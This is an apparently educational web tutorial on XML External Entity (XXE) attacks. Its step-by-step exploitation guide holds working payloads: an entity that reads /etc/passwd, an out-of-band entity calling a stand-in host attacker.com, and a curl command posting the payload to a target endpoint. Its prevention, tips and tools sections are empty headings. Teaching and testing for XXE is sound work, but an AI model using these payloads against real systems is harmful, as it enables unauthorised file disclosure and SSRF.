🧬 XML External Entities (XXE)

Learn how improper XML parsing can lead to sensitive data exposure, SSRF, and system compromise.

What is XXE?

XML External Entity (XXE) is a vulnerability that occurs when an XML parser improperly processes external entities. If user-supplied XML input is parsed without proper security configurations, attackers may exploit it to:

Types of XXE Attacks

1. File Disclosure

Leaking sensitive files like /etc/passwd or application configs.

2. SSRF via External Entities

Trigger internal network requests using crafted URLs in the DOCTYPE.

3. Out-of-Band (OOB) Exploitation

Exfiltrate data via DNS, HTTP requests, or external callbacks (useful when blind).

Step-by-Step Exploitation Guide

πŸ§ͺ Step 1: Identify XML Input

Look for places where XML is accepted. Common examples:

πŸ›  Step 2: Send a Test Payload

Basic test to check if the parser processes external entities:

<?xml version="1.0" ?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>&xxe;</root>

πŸ“₯ Step 3: Analyze the Response

If the file contents appear in the response or error, the target is vulnerable.

🌐 Step 4: Exfiltration (OOB)

Use your own server or Burp Collaborator to detect OOB requests:

<!DOCTYPE foo [ 
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://attacker.com/xxe.txt"> 
]>
<foo>&xxe;</foo>

Real-World Exploit Example

Example using cURL against a vulnerable endpoint:

curl -X POST https://target.com/api/xml \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?>
      <!DOCTYPE root [
        <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
      <root>&xxe;</root>'

Observe the server’s response to confirm file disclosure.

πŸ” How to Prevent XXE

πŸ’‘ Tips for Pentesters

πŸ“š Recommended Tools